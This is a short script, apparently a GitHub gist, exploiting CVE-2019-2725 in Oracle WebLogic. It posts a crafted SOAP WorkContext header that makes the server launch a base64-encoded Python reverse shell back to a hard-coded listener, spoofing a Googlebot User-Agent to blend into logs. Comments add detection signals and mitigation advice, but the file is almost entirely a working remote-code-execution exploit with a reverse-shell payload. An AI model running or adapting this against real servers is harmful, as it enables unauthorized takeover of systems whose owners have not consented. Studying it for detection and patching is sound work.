
@gteissier
Created May 3, 2019 09:51
CVE-2019-2725
#!/usr/bin/env python
import requests
import sys
from base64 import b64encode
# Call-back listener address baked into the payload. Both values are hard-coded,
# so the script only ever phones home to this one host/port.
LHOST = '172.16.89.1'
LPORT = 8888
# Stage executed on the WebLogic host: opens a TCP socket to LHOST:LPORT,
# dup2()s it over fds 0/1/2 and then runs an interactive /bin/sh on that socket.
# Defender view: the observable is a new outbound TCP connection from the
# WebLogic server process, with a "python" child that in turn spawns "/bin/sh -i".
RSHELL = 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%d));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' % (LHOST, LPORT)
# Base64-wraps RSHELL so it can sit inside an XML text node; the wrapper undoes
# that with the str.decode("base64") codec, which is a Python 2-only construct
# (as is the print statement further down).
exploit = 'exec("%s".decode("base64"))' % b64encode(RSHELL)
# Target URL is taken verbatim from argv[1]; there is no validation at all.
url = sys.argv[1]
# The User-Agent impersonates Googlebot, presumably so the POST blends into
# crawler noise in access logs; Content-Type text/xml is what the SOAP endpoint
# parses.
request_headers = {"Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Accept-Language": "en", "User-Agent": "Googlebot/2.1 (+http://www.google.com/bot.html)", "Connection": "close", "Content-Type": "text/xml"}
# SOAP envelope addressed to the AsyncResponseService namespace. The payload is
# the <work:WorkContext> header: java.beans.XMLDecoder-style XML that builds a
# java.lang.ProcessBuilder over ["python", "-c", exploit] and invokes start(),
# i.e. the WorkContext deserialization weakness tracked as CVE-2019-2725.
# Detection: a POST with Content-Type text/xml whose body carries work:WorkContext
# together with java.lang.ProcessBuilder or <void method="start"/> is a strong
# signal. Mitigation: apply the vendor fix for CVE-2019-2725 and restrict network
# access to the async SOAP endpoint this envelope targets.
data="<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\">\r\n <soapenv:Header>\r\n <wsa:Action>xx</wsa:Action>\r\n <wsa:RelatesTo>xx</wsa:RelatesTo>\r\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\r\n <void class=\"java.lang.ProcessBuilder\">\r\n <array class=\"java.lang.String\" length=\"3\">\r\n <void index=\"0\">\r\n <string>python</string>\r\n </void>\r\n <void index=\"1\">\r\n <string>-c</string>\r\n </void>\r\n <void index=\"2\">\r\n <string>%s</string>\r\n </void>\r\n </array>\r\n <void method=\"start\"/></void>\r\n </work:WorkContext>\r\n </soapenv:Header>\r\n <soapenv:Body>\r\n <asy:onAsyncDelivery/>\r\n </soapenv:Body>\r\n</soapenv:Envelope>" % (exploit)
# Single HTTP POST; the effect happens server-side while the header is parsed,
# so the HTTP status says little about whether the ProcessBuilder actually ran.
response = requests.post(url, headers=request_headers, data=data)
# Python 2 print statement; the following line is the Response object's repr.
print "status_code:%s" % str(response.status_code)
print(response)